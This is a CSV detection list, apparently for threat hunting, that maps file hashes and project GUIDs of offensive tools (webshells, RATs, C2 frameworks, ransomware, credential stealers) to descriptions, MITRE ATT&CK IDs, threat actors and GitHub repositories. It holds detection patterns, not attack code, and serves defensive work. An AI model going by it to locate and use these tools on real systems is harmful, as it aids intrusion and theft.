"*32f5aea45557a6aeec3a769c774b105805828aaaa5ceca7b0b3304e0c7f99894*",".{0,1000}32f5aea45557a6aeec3a769c774b105805828aaaa5ceca7b0b3304e0c7f99894.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","24368"
"*32f5aea45557a6aeec3a769c774b105805828aaaa5ceca7b0b3304e0c7f99894*",".{0,1000}32f5aea45557a6aeec3a769c774b105805828aaaa5ceca7b0b3304e0c7f99894.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","24369"
"*330253612d4c4a3791acfd82257d5a4c1e68ec989e0647abfa4baa560cf0a046*",".{0,1000}330253612d4c4a3791acfd82257d5a4c1e68ec989e0647abfa4baa560cf0a046.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24370"
"*330ffb5abd7f035bc263a5f5938325aeb91a4d22e15ed1814d6a78098e00fb36*",".{0,1000}330ffb5abd7f035bc263a5f5938325aeb91a4d22e15ed1814d6a78098e00fb36.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24372"
"*331494b772e936769247a43746a6ac828257c145cb3e514e8682ceb5d58af06f*",".{0,1000}331494b772e936769247a43746a6ac828257c145cb3e514e8682ceb5d58af06f.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","24374"
"*3318d1dd3fcab5f3e4ab3cc5b690a3f4*",".{0,1000}3318d1dd3fcab5f3e4ab3cc5b690a3f4.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","24375"
"*331952cdf2781133eafa25e3115db3e9cfb2cbf9b208fbcb6a462eab2e314343*",".{0,1000}331952cdf2781133eafa25e3115db3e9cfb2cbf9b208fbcb6a462eab2e314343.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","0","#filehash","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","24376"
"*332346668c99d0c6bd383f9a0f6c32e7ea3cedf4788468d1d373d3f106f4469d*",".{0,1000}332346668c99d0c6bd383f9a0f6c32e7ea3cedf4788468d1d373d3f106f4469d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24377"
"*33323e73135262eaea63742b1c638a42fd535238c2bf2e6baa1b42fb593b0ddd*",".{0,1000}33323e73135262eaea63742b1c638a42fd535238c2bf2e6baa1b42fb593b0ddd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24380"
"*3338c8a4e14d314a4a3313dc67cb1e1f2274c8b30cc2cdf55586d7cdba2a6d68*",".{0,1000}3338c8a4e14d314a4a3313dc67cb1e1f2274c8b30cc2cdf55586d7cdba2a6d68.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24381"
"*33418fd2e30db0c4c6ee6c62ded3b4707045e618939c2b772e0cee4efa7f3e67*",".{0,1000}33418fd2e30db0c4c6ee6c62ded3b4707045e618939c2b772e0cee4efa7f3e67.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24384"
"*3342b13f536e40d34e2a0155667854ddd3904c193db870c7c759365530b2ae82*",".{0,1000}3342b13f536e40d34e2a0155667854ddd3904c193db870c7c759365530b2ae82.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24386"
"*334a8657b76c88f5d7b6a2be78cc4e9e6c5ecaeea5a104cea5e6d0c4250674a7*",".{0,1000}334a8657b76c88f5d7b6a2be78cc4e9e6c5ecaeea5a104cea5e6d0c4250674a7.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","24387"
"*33513a09abcccf0f96dec767ad33fd00b6086d00232be225457ab9bec12bd45b*",".{0,1000}33513a09abcccf0f96dec767ad33fd00b6086d00232be225457ab9bec12bd45b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24389"
"*335203012039eb31e583004d1d19b67bb296425e600fc4e575eda033a655a107*",".{0,1000}335203012039eb31e583004d1d19b67bb296425e600fc4e575eda033a655a107.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24390"
"*335628fdb196d750906961db6ce9ec4c35fb7c16f6883c441c6c620468e273c1*",".{0,1000}335628fdb196d750906961db6ce9ec4c35fb7c16f6883c441c6c620468e273c1.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","24391"
"*3356e2d9bb13604bd6e11826ef39f433f6b847c7d3d172e33ceb7d9da779c079*",".{0,1000}3356e2d9bb13604bd6e11826ef39f433f6b847c7d3d172e33ceb7d9da779c079.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24392"
"*33571B09-4E94-43CB-ABDC-0226D769E701*",".{0,1000}33571B09\-4E94\-43CB\-ABDC\-0226D769E701.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#GUIDproject","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","24393"
"*335ac01e952db33997b844a2e7c506d541e353d6e82ead3fde51e4879fde736a*",".{0,1000}335ac01e952db33997b844a2e7c506d541e353d6e82ead3fde51e4879fde736a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","24394"
"*335d51e8af6d00637461087ad4531061213e38a8bb020796fd67d53b7b01a9c4*",".{0,1000}335d51e8af6d00637461087ad4531061213e38a8bb020796fd67d53b7b01a9c4.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","24396"
"*335f1dcefb6d0e3e4a2e97d68d54d87cb53f6ba029a428a048752b19ecca71ad*",".{0,1000}335f1dcefb6d0e3e4a2e97d68d54d87cb53f6ba029a428a048752b19ecca71ad.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","24398"
"*335ff83fa33730df73dca7bb504898b78823c065a7437807fb9a2ff52d5b14e8*",".{0,1000}335ff83fa33730df73dca7bb504898b78823c065a7437807fb9a2ff52d5b14e8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24399"
"*3364dd7d78f44251e596a40b35adb6fcc5a38c1da2741f69e13f09cb721dcd47*",".{0,1000}3364dd7d78f44251e596a40b35adb6fcc5a38c1da2741f69e13f09cb721dcd47.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24401"
"*3365bdc76c116ce83c56e7d2e4c7c046a6a82d24bb23982c46bdb6476c6807f6*",".{0,1000}3365bdc76c116ce83c56e7d2e4c7c046a6a82d24bb23982c46bdb6476c6807f6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24402"
"*336b7dca10b75274a81c04cdba1989781ad742e968ebd41e5f901e66f106204c*",".{0,1000}336b7dca10b75274a81c04cdba1989781ad742e968ebd41e5f901e66f106204c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24404"
"*3379f86e6b7a13491a8aa668e567b7dfc532d79da5216fd50e3659f7ea9df372*",".{0,1000}3379f86e6b7a13491a8aa668e567b7dfc532d79da5216fd50e3659f7ea9df372.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","24406"
"*337cd6f66f324a1e30d9bae046f10577318da2126f3981dfff99c6def8799bd4*",".{0,1000}337cd6f66f324a1e30d9bae046f10577318da2126f3981dfff99c6def8799bd4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24407"
"*337dcd762be6b0cd6566fd44bc161387d836557f78cc595804a2a04623a5f505*",".{0,1000}337dcd762be6b0cd6566fd44bc161387d836557f78cc595804a2a04623a5f505.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24408"
"*337ED7BE-969A-40C4-A356-BE99561F4633*",".{0,1000}337ED7BE\-969A\-40C4\-A356\-BE99561F4633.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","#GUIDproject","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","24409"
"*337ED7BE-969A-40C4-A356-BE99561F4633*",".{0,1000}337ED7BE\-969A\-40C4\-A356\-BE99561F4633.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","#GUIDproject","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","24410"
"*3383dfa09bf9497b70b13bfc0baa3dfdef51d6689a04e25a3adc769f76b775ef*",".{0,1000}3383dfa09bf9497b70b13bfc0baa3dfdef51d6689a04e25a3adc769f76b775ef.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24411"
"*33905c6c09d7bfd90a6afa48e1ba9bf6349439cb1b397f7981970631c11a4dfb*",".{0,1000}33905c6c09d7bfd90a6afa48e1ba9bf6349439cb1b397f7981970631c11a4dfb.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24414"
"*339644dd4613c28f3d05677cf26f56c6196b4bd49e2ee32b1ec666113f1fd6b7*",".{0,1000}339644dd4613c28f3d05677cf26f56c6196b4bd49e2ee32b1ec666113f1fd6b7.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","24415"
"*3397fa7a9770b48fc268eae7a8f8f7f01a7f68c965727a35b85c9128fbe3b835*",".{0,1000}3397fa7a9770b48fc268eae7a8f8f7f01a7f68c965727a35b85c9128fbe3b835.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24416"
"*339946aaf56d168682d5823ec417bfe5d5d7e9879b85a1d4672c75aab8a77c0e*",".{0,1000}339946aaf56d168682d5823ec417bfe5d5d7e9879b85a1d4672c75aab8a77c0e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24417"
"*33a286f3a77dd581011f646b2b96e6ac55f2d6a7cca7fdc3d4a0b45d063d912b*",".{0,1000}33a286f3a77dd581011f646b2b96e6ac55f2d6a7cca7fdc3d4a0b45d063d912b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24418"
"*33a6ca1dea55d7cd2edc7d25de16ce7689fcfc7c51fb2f26ebe1a07a3c81c017*",".{0,1000}33a6ca1dea55d7cd2edc7d25de16ce7689fcfc7c51fb2f26ebe1a07a3c81c017.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","24419"
"*33a8d6b2525e1a6f96b05cea34403292a78d8d5f6c58100c03d48c8c1e49c474*",".{0,1000}33a8d6b2525e1a6f96b05cea34403292a78d8d5f6c58100c03d48c8c1e49c474.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24420"
"*33b38994e71d9317e92ce4c8062e8005e15751432f88b35e8536e851425d5adb*",".{0,1000}33b38994e71d9317e92ce4c8062e8005e15751432f88b35e8536e851425d5adb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24424"
"*33b54c9b555472d471ff2eb145156d7212e13ad4282b020527267ca42c2afafe*",".{0,1000}33b54c9b555472d471ff2eb145156d7212e13ad4282b020527267ca42c2afafe.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","24425"
"*33b7357209a182696c26be19723b759608d453a6492e9ee57abf619c7c44de61*",".{0,1000}33b7357209a182696c26be19723b759608d453a6492e9ee57abf619c7c44de61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24426"
"*33bd8a0ee9aba1b5c63f44d993def62986b98ca01590bc1bf2638190b2dd5961*",".{0,1000}33bd8a0ee9aba1b5c63f44d993def62986b98ca01590bc1bf2638190b2dd5961.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","24428"
"*33BF8AA2-18DE-4ED9-9613-A4118CBFC32A*",".{0,1000}33BF8AA2\-18DE\-4ED9\-9613\-A4118CBFC32A.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","#GUIDproject","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","24429"
"*33c0ff5f78f090a28573baf8ad735c82728c289a7ddf80df5bbf90c794cd7f39*",".{0,1000}33c0ff5f78f090a28573baf8ad735c82728c289a7ddf80df5bbf90c794cd7f39.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24430"
"*33c1c910095186228f4a1843ab48098179b8ef57d0b235cdd483da5438a4aa49*",".{0,1000}33c1c910095186228f4a1843ab48098179b8ef57d0b235cdd483da5438a4aa49.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#filehash","N/A","10","","N/A","","","","24431"
"*33c6f02299b0000508619734f88c1c8bb0c8edf302efbd55c146e9a59aad4424*",".{0,1000}33c6f02299b0000508619734f88c1c8bb0c8edf302efbd55c146e9a59aad4424.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24432"
"*33c9dbfdd337a5fb8cc15a62bc9800d9a58799ccf21cb1b9bf3e7b7754c5eca2*",".{0,1000}33c9dbfdd337a5fb8cc15a62bc9800d9a58799ccf21cb1b9bf3e7b7754c5eca2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24433"
"*33ca24f0ff7df10eec6dc4e226f8ad5410cd475e1c24976cff824d6a09fe98e5*",".{0,1000}33ca24f0ff7df10eec6dc4e226f8ad5410cd475e1c24976cff824d6a09fe98e5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24435"
"*33cc5cb674c4c4a7aa6a724b980e9e8f9d918f605ac892628da6ba6230423f3c*",".{0,1000}33cc5cb674c4c4a7aa6a724b980e9e8f9d918f605ac892628da6ba6230423f3c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24436"
